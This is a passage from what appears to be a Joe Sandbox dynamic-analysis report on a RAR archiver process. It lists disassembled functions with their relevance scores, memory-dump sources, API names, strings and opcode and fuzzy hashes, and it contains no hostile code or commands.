                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0241A172A09B8589F704CF65E8417DD37A4EB08398F0055B6EE6C87B99EE3DD02AC344
                                                                                                                                                                                                                                Function 00007FF6FAA37988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1039280553-0
                                                                                                                                                                                                                                • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                • Instruction ID: 95632c6fd794e1a53098537790a588c005d4aba691ecfd7d7ad605a607bfc947
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4218626A1864297EB009F25A90053A6365FB89BD1F540270EE6A537A8EE3DE55BC700
                                                                                                                                                                                                                                Function 00007FF6FAA70140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 932687459-0
                                                                                                                                                                                                                                • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                • Instruction ID: c0fd2462ddbb3faf3a3df9d65245f371444c84e3a66d35a8453ee7da6e01475e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C81B362A0DA8286EB61DA11E4403BB6391EB44B94F184171DB6DC7BDDEF3CE95B8340
                                                                                                                                                                                                                                Function 00007FF6FAA2C468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                                • API String ID: 233258989-2277559157
                                                                                                                                                                                                                                • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                • Instruction ID: 25aee420c0ed4ecfeea69fc5e424db4273d35deef5045156abdf538f9b0adc20
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B102DF22A0C68285EB28DE2A95453FE6391AF45780F0440B5DAAEC77C2FE7DF55E8301
                                                                                                                                                                                                                                Function 00007FF6FAA41634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                                • String ID: rtmp%d
                                                                                                                                                                                                                                • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                                • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                • Instruction ID: 08385590d8f4600612170f89fca6ba8a382b7ebb9c87da1da2fc7cab89088251
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13516F22A18A8645EB71AF21D8411FE6351BF45BC4F551071ED2ECBAEAFE3CD60AC700
                                                                                                                                                                                                                                Function 00007FF6FAA6B650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                                • String ID: rar -ioff
                                                                                                                                                                                                                                • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                                • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                • Instruction ID: ea5771c1a44597ce9294de6614cdb5132e733d858e5634d488403f9c70c7ea1c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01D128E5DA0BC2FB18DB70EA542722355AF49741F4404B0E82EC23E0EF3EE05F8A40
                                                                                                                                                                                                                                Function 00007FF6FAA6B470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                • API String ID: 667068680-1824683568
                                                                                                                                                                                                                                • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                • Instruction ID: 549d12ca9e303d334d4afeb6ee7c84f05877bfc42421023efc2880d95ea12854
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6F01925A49B4692EF049B15FA540762360AF4EBC0B4860B0ED2E877A8FF2DE55EC700
                                                                                                                                                                                                                                Function 00007FF6FAA81ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                                                                • API String ID: 3215553584-2137968064
                                                                                                                                                                                                                                • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                • Instruction ID: b22f9509dc7b02dd4cd0173df87b0f04ac55ea39c7c441756f44938da9ab2299
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C12A336E0D1C385FB659A1590442B967A6EF00764FD842B2D6BAC36C4FF2CEA5EC305
                                                                                                                                                                                                                                Function 00007FF6FAA3E49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2092471728-0
                                                                                                                                                                                                                                • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                • Instruction ID: 627d8a710858ec0b5e3e5ce69ee2e864eb0ff34c8dc277725a2529dace0965df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951543261874186EB70CF25E44116AB7E5FB89B94F500275EAAD83BD8EF3DD54ACB00
                                                                                                                                                                                                                                Function 00007FF6FAA6BC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2092733347-0
                                                                                                                                                                                                                                • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                • Instruction ID: 004973dd8e8815e9cfeb96b621cf0f066da84487180851a2dadfed82a6a93ffc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82513BB2B14655CAEB54CFB8D4405AC37B1F708788B50403ADE1E9BB98EE38D55ACB00
                                                                                                                                                                                                                                Function 00007FF6FAA6C254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2092733347-0
                                                                                                                                                                                                                                • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                • Instruction ID: 71845e03dcd21cac66290fe2f0dfd3dbe741d49373ab57b72e4fbb26bc152a07
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA313C63B1465189FB00CFB4D8901BD7770FB08B58B54502AEF1E97AA8EF38D59AC704
                                                                                                                                                                                                                                Function 00007FF6FAA5EB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
